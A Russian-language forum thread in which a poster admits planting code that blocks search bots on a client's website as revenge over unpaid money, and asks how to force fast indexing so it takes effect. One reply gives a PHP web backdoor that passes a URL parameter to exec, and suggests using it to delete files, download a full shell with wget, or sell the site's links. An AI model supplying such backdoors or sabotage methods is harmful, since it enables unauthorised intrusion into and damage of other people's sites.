Jump to content

Код убийца


Recommended Posts

Ребят, нужен грамотный ап индексации за максимально короткий период времени. У меня есть клиент, который опрокинул меня на деньги. Я в систему вписал код-убийцу, который должен к чертям сломать всю систему и ирархию ресурса. Но для этого нужен быстрый ап индексации, что бы код и все ссылки всосались, как это сделать (Возможность принудительной индексации). 

Link to post
Share on other sites

Извините, что я только что прочел ?! Какой еще код-убийца и индексация, что у вас с логикой и подачей мысли? 

Чаще всего, достаточно делать бэкдор, вроде следующего(php):

isset($_GET['cmd'])
    print_r(exec($_GET['cmd']));

И исполнять как file_name.php?cmd=ls (листинг) или другие команды, вплоть до удаления или загрузки через wget() полноценного шелла или прочих приблуд, вплоть до загона сайта в sape и компенсации своих усилий  :)

Что у вас за "код-убийца" и зачем для этого наличие в индексе!!! вовсе не ясно. И еще, как ап может быть грамотным? Обновление поискового индекса проводит сама поисковая система по собственному графику, повлиять на это не может никто. Есть быстроробот, но это вовсе иное.

Link to post
Share on other sites

Извините, что я только что прочел ?! Какой еще код-убийца и индексация, что у вас с логикой и подачей мысли? 

Чаще всего, достаточно делать бэкдор, вроде следующего(php):

isset($_GET['cmd'])
    print_r(exec($_GET['cmd']));

И исполнять как file_name.php?cmd=ls (листинг) или другие команды, вплоть до удаления или загрузки через wget() полноценного шелла или прочих приблуд, вплоть до загона сайта в sape и компенсации своих усилий  :)

Что у вас за "код-убийца" и зачем для этого наличие в индексе!!! вовсе не ясно. И еще, как ап может быть грамотным? Обновление поискового индекса проводит сама поисковая система по собственному графику, повлиять на это не может никто. Есть быстроробот, но это вовсе иное.

 

В крации, в php был кинут код, но для того что бы он заработал, нужна принудительная индексация. Это все для того, что бы потом незаметно проникнуть в систему. 

Link to post
Share on other sites
  • Модератор

 

 


В крации
  ....ну просто рукалицо.

 

ТС, каким образом он вас "опрокинул на деньги"? Может, с его точки зрения вы некачественно выполнили свою работу?

Link to post
Share on other sites

  ....ну просто рукалицо.

 

ТС, каким образом он вас "опрокинул на деньги"? Может, с его точки зрения вы некачественно выполнили свою работу?

 

 

о боги, я спросил не просто так. Просто начальство попросило узнать

Link to post
Share on other sites

В крации, в php был кинут код, но для того что бы он заработал, нужна принудительная индексация. Это все для того, что бы потом незаметно проникнуть в систему. 

Извините, но что твориться в вашей голове? 

Нет такого слова или словоформы в русском(да и разговорном) языке "В крации". 

 

в php был кинут код

Что простите?! Код может быть НАПИСАН на языке программирования "PHP" и в худшем смысле выражения он может быть "кинут" в файловую систему операционной системы физического оборудования.

 

нужна принудительная индексация

Нет такого термина или понятия. Принудительным, извините, может быть сексуальное рабство. 

Индексация(если своими словами и кратко) - это процесс сканирования поисковым роботом страниц вашего сайта и занесения информации о них в единую базу, по средствам которой поисковая система оперирует при составлении ответов на запросы пользователя. 

 

 

все для того, что бы потом незаметно проникнуть в систему

Что извините? Если на сайте есть бэкдор - какая разница, как вы проникните в систему? Для этого не нужна ни индексация ни что-либо еще.

П.с. - здается мне, что автор создал "очередной шедевр" в виде рядового ГС-а и ему попросту нужно загнать страницы в индекс.

Link to post
Share on other sites

Извините, но что твориться в вашей голове? 

Нет такого слова или словоформы в русском(да и разговорном) языке "В крации". 

Что простите?! Код может быть НАПИСАН на языке программирования "PHP" и в худшем смысле выражения он может быть "кинут" в файловую систему операционной системы физического оборудования.

Нет такого термина или понятия. Принудительным, извините, может быть сексуальное рабство. 

Индексация(если своими словами и кратко) - это процесс сканирования поисковым роботом страниц вашего сайта и занесения информации о них в единую базу, по средствам которой поисковая система оперирует при составлении ответов на запросы пользователя. 

Что извините? Если на сайте есть бэкдор - какая разница, как вы проникните в систему? Для этого не нужна ни индексация ни что-либо еще.

П.с. - здается мне, что автор создал "очередной шедевр" в виде рядового ГС-а и ему попросту нужно загнать страницы в индекс.

 

Мне только сейчас объяснили все нормальным языком, что от меня требуется. Поэтому прошу извинение за каламбур. Оказалось все просто. В  htaccess был добавлен код, который воспринимает Поисковых ботов как вирусы и не дает им бродить по сайту, все это начинает работать, когда идет индексация. Но для ускорения индексации - "Быстроробот", мы просто добавили RSS ленту, что бы за максимально короткое время положить работоспособность ресурса и его индексацию. 

Link to post
Share on other sites

Мне только сейчас объяснили все нормальным языком, что от меня требуется. Поэтому прошу извинение за каламбур. Оказалось все просто. В  htaccess был добавлен код, который воспринимает Поисковых ботов как вирусы и не дает им бродить по сайту, все это начинает работать, когда идет индексация. Но для ускорения индексации - "Быстроробот", мы просто добавили RSS ленту, что бы за максимально короткое время положить работоспособность ресурса и его индексацию. 

Более простым языком - в htaccess настроен 404 ответ на известные IP-адреса/хедеры/прочее ботов.

Если следовать такой логике - вам ничего делать не нужно, ибо ресурс жертвы индексироваться не будет итак. Каков смысл пытаться вогнать его в индекс, если в априори он туда итак не въедет? Т.е. - вгоняй не вгоняй а изменений вы не увидите, поэтому нет смысла в подобных действиях. 

Делать ничего не нужно, просто ждите, когда пациент спросит вас "а шо с ресурсом, почему не индексируется" 

Link to post
Share on other sites

Более простым языком - в htaccess настроен 404 ответ на известные IP-адреса/хедеры/прочее ботов.

Если следовать такой логике - вам ничего делать не нужно, ибо ресурс жертвы индексироваться не будет итак. Каков смысл пытаться вогнать его в индекс, если в априори он туда итак не въедет? Т.е. - вгоняй не вгоняй а изменений вы не увидите, поэтому нет смысла в подобных действиях. 

Делать ничего не нужно, просто ждите, когда пациент спросит вас "а шо с ресурсом, почему не индексируется" 

 

я уже понял это) просто попросили сделать это до выходных. Так как ап будет только через 10 дней. А нужно сейчас. 

Link to post
Share on other sites

я уже понял это) просто попросили сделать это до выходных. Так как ап будет только через 10 дней. А нужно сейчас. 

 

откуда инфа?))) Вангуем?) Или ап делается по вашему требованию?)

Link to post
Share on other sites

откуда инфа?))) Вангуем?) Или ап делается по вашему требованию?)

 

был расчет для определенного сайта 

 

Тему прошу закрыть. Всем Спасибо 

Link to post
Share on other sites
Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...